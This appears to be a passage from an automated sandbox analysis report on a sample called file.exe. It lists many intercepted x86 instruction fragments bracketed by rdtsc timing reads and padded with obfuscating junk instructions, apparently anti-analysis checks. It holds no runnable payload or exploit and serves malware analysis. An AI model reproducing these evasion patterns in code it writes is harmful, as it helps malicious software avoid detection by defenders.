                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18F87 second address: B18FCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F0AD8C6A9CAh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0AD8C6A9BEh 0x0000001e popad 0x0000001f pop ebx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193B5 second address: B193BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193BF second address: B193CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9BCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193CF second address: B193D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B193D3 second address: B193E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19C01 second address: B19C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B19C09 second address: B19C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A0AF second address: B1A0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A13F second address: B1A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A1C7 second address: B1A1D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A63E second address: B1A67A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add esi, dword ptr [ebp+122D3580h] 0x00000012 push 00000000h 0x00000014 ja 00007F0AD8C6A9BCh 0x0000001a push 00000000h 0x0000001c add esi, dword ptr [ebp+122D2D45h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A67A second address: B1A67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1A67E second address: B1A684 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AF82 second address: B1AF9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1AF9A second address: B1AFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1C0AC second address: B1C129 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F0AD95F8826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F0AD95F8828h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F0AD95F8837h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F0AD95F8828h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+1244EE55h], edi 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5DF second address: B1D5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D2F8 second address: B1D317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD95F8834h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5E3 second address: B1D5E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5E9 second address: B1D5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D5EF second address: B1D5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21DEE second address: B21DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21DF2 second address: B21DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22EB3 second address: B22EBD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22EBD second address: B22ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0AD8C6A9C2h 0x0000000d jbe 00007F0AD8C6A9BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2403A second address: B24056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0AD95F8826h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24056 second address: B2405A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2405A second address: B240BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F0AD95F8828h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1D80h], ecx 0x00000028 push ebx 0x00000029 mov dword ptr [ebp+12450094h], eax 0x0000002f pop edi 0x00000030 mov ebx, ecx 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+1246257Ah], ecx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122DB8C3h], ecx 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F0AD95F8835h 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24F37 second address: B24F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24F3B second address: B24F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24F48 second address: B24FD2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0AD8C6A9B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F0AD8C6A9C7h 0x00000027 push 00000000h 0x00000029 add edi, 7ED3A103h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F0AD8C6A9B8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub edi, 6EFFF232h 0x00000051 mov bh, 15h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 jbe 00007F0AD8C6A9B8h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F0AD8C6A9BEh 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B25E96 second address: B25F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F0AD95F8833h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov di, A1D5h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jmp 00007F0AD95F882Bh 0x00000037 push 00000000h 0x00000039 xor dword ptr [ebp+122DB8AFh], eax 0x0000003f push eax 0x00000040 pushad 0x00000041 push esi 0x00000042 jmp 00007F0AD95F8833h 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0AD95F882Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26D9B second address: B26DA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26DA1 second address: B26DAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B260C1 second address: B26131 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F0AD8C6A9B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D2E64h], ecx 0x0000002d mov bx, cx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jnp 00007F0AD8C6A9BCh 0x0000003d add dword ptr [ebp+122D1894h], ecx 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a or dword ptr [ebp+122D339Fh], edx 0x00000050 mov eax, dword ptr [ebp+122D10E9h] 0x00000056 sbb di, CE16h 0x0000005b mov ebx, dword ptr [ebp+122D2BDDh] 0x00000061 push FFFFFFFFh 0x00000063 stc 0x00000064 nop 0x00000065 pushad 0x00000066 jnc 00007F0AD8C6A9BCh 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26EEC second address: B26F0D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0AD95F8835h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26F0D second address: B26F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B26FD0 second address: B26FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A176 second address: B2A17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B281C4 second address: B281C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E34E second address: B2E352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E352 second address: B2E36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD95F8835h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2F1E0 second address: B2F1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0AD8C6A9B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2A4A5 second address: B2A4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2C45E second address: B2C4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov edi, 2734DDEBh 0x00000016 sub dword ptr [ebp+122D1AB2h], esi 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov bx, CE72h 0x00000027 mov eax, dword ptr [ebp+122D04BDh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0AD8C6A9B8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 sbb bh, FFFFFF9Ah 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edx 0x0000004f call 00007F0AD8C6A9B8h 0x00000054 pop edx 0x00000055 mov dword ptr [esp+04h], edx 0x00000059 add dword ptr [esp+04h], 0000001Dh 0x00000061 inc edx 0x00000062 push edx 0x00000063 ret 0x00000064 pop edx 0x00000065 ret 0x00000066 nop 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3016A second address: B3016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D477 second address: B2D47B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E468 second address: B2E47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0AD95F882Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2C4E7 second address: B2C4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3016E second address: B301F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0AD95F8828h 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F0AD95F8836h 0x00000014 jmp 00007F0AD95F8830h 0x00000019 nop 0x0000001a pushad 0x0000001b mov dl, C1h 0x0000001d mov dword ptr [ebp+122D339Fh], ebx 0x00000023 popad 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F0AD95F8828h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 xor dword ptr [ebp+122D1CF2h], edx 0x00000046 push 00000000h 0x00000048 sub dword ptr [ebp+122D34B1h], eax 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 jmp 00007F0AD95F882Bh 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F0AD95F8833h 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2E47C second address: B2E481 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B301F3 second address: B30200 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D557 second address: B2D55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D55B second address: B2D583 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F882Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B350BF second address: B350CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0AD8C6A9B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B394BB second address: B394C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0AD95F8826h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF384 second address: ADF39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF39A second address: ADF3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF3A2 second address: ADF3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C41 second address: B38C5E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0AD95F882Fh 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C5E second address: B38C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C62 second address: B38C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C68 second address: B38C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C6E second address: B38C78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0AD95F8832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38C78 second address: B38C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0AD8C6A9B6h 0x0000000a jnp 00007F0AD8C6A9BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B38DC0 second address: B38DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F75D second address: B3F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F763 second address: B3F770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F770 second address: B3F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F776 second address: B3F793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F0AD95F882Fh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F793 second address: B3F7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9C1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F854 second address: B3F85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0AD95F8826h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F85E second address: B3F893 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jnl 00007F0AD8C6A9B8h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e je 00007F0AD8C6A9DEh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0AD8C6A9BDh 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F950 second address: B3F968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3F968 second address: B3F96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43D98 second address: B43D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B441C8 second address: B441FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop eax 0x0000000f push edx 0x00000010 je 00007F0AD8C6A9B6h 0x00000016 pop edx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b jmp 00007F0AD8C6A9C2h 0x00000020 pop ebx 0x00000021 ja 00007F0AD8C6A9BEh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B441FE second address: B44204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
